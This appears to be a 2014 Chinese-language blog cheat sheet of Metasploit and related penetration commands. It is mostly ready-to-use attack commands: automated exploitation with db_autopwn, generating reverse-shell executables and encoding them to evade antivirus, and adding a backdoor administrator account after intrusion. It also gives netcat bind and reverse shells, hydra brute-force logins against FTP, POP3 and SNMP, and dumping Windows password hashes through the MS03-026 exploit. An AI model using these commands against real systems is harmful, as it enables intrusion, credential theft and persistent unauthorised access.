msf常用命令

时间:2014-05-01 17:16:00 +0800

svn update 升级 ./msfweb Web接口127.0.0.1:55555。. ./msfconsole 字符下的Console。 help 帮助 show 显示选项

search 搜索名字

use 使用漏洞

show options 显示选项

set 设置选项

show payloads 显示装置

set PAYLOAD 设置装置

show options 显示选项

set 设置选项

show targets 显示目标(os版本)

set TARGET 设置目标版本

exploit 开始漏洞攻击

sessions -l 列出会话

sessions -i 选择会话

sessions -k 结束会话

ctrl z 把会话放到后台

ctrl c 结束会话

jobs 列出漏洞运行工作

jobs -K 结束一个漏洞运行工作

show auxiliary 显示辅助模块

use auxiliary name 使用辅助模块

set option 设置选项

run 运行模块

scanner/smb/version 扫描系统版本

scanner/mssql/mssql_ping 测试mssql是否在线

scanner/mssql/mssql_login 测试登录(暴力或字典)

Attacker behind firewall: bind shell正向

Target behind firewall: reverse shell反向

Meterpreter衔接不懂dos的可以用这个:

db_import_nessus_nbe 加载nessus的扫描结果

db_import_nmap_xml 加载nmap的扫描结果

自动化攻击流程:

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

db_destroy pentest

db_create pentest

db_nmap targetIP

db_hosts

db_services

db_autopwn -t -p -e

字符接口攻击流程:

./msfcli | grep -i name

./msfcli auxiliary

./msfcli PAYLOAD E

做木马后门等:

./msfpayload

S summary and options of payload

C C language

P Perl

y Ruby

R Raw, allows payload to be piped into msfencode and other tools

J JavaScript

X Windows executable

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe

编码处理就是做免杀:

./msfencode options variable

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00´-l

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b ‘x00´-e PexFnstenvMor -t c

入侵后在windows下添加管理员用户:

hostname 查看主机名

net users 查看用户

net user 用户密码/add 添加用户

net localgroup 查看工作组

net localgroup administrators 查看管理员组

net localgroup administrators x /add 将用户加入管理员组

TFTP

cp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上

tftp -i 10.1.1.2 GET nc.exe下载

netcat瑞士军刀

attacker: 10.1.1.1

target: 10.1.1.2

nc -v -z 10.1.1.2 1-1024 端口扫描

target: nc -lvp 4444 聊天设置(服务)

attacker: nc -v 10.1.1.2 4444 聊天设置(客户)

target: nc -lvp 4444 > output.txt传输文件(接受)

attacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)

target: nc -lvp 4444 -e cmd.exe Bind shell。

attacker: nc -v 10.1.1.2 4444

target:nc -lvp 4444 Reverse shell。

attacker:nc -v 10.1.1.2 4444 -e /bin/bash

密码

字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words

cat words | wc -l 显示个数(30多万个)

暴力:

hydra -l ftp -P words -v targetIP ftp 攻击ftp。

hydra -l muts -P words -v targetIP pop3 攻击pop3

hydra -P words -v targetIP snmp 攻击snmp

攻击microsof VPN

nmap -p 1723 targetIP

dos2unix words

cat words | thc-pptp-bruter targetIP

WYD:

wget -r www.target.com –accept=pdf 下载pdf文档

wyd.pl -o output.txt www.target.com/

cat output.txt | more

SAM文件(windows下的密码文件):

%SYSTEMROOT%/system32/config

%SYSTEMROOT%/repair

备份windows的hash文件:

./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E

meterpreter > upload -r /tmp/pwdump6 c:windowssystem32

meterpreter > execute -f cmd -c

meterpreter > interact x

C:WINDOWSsystem32> pwdump 127.0.0.1

×

Subscribe

The latest tutorials sent straight to your inbox.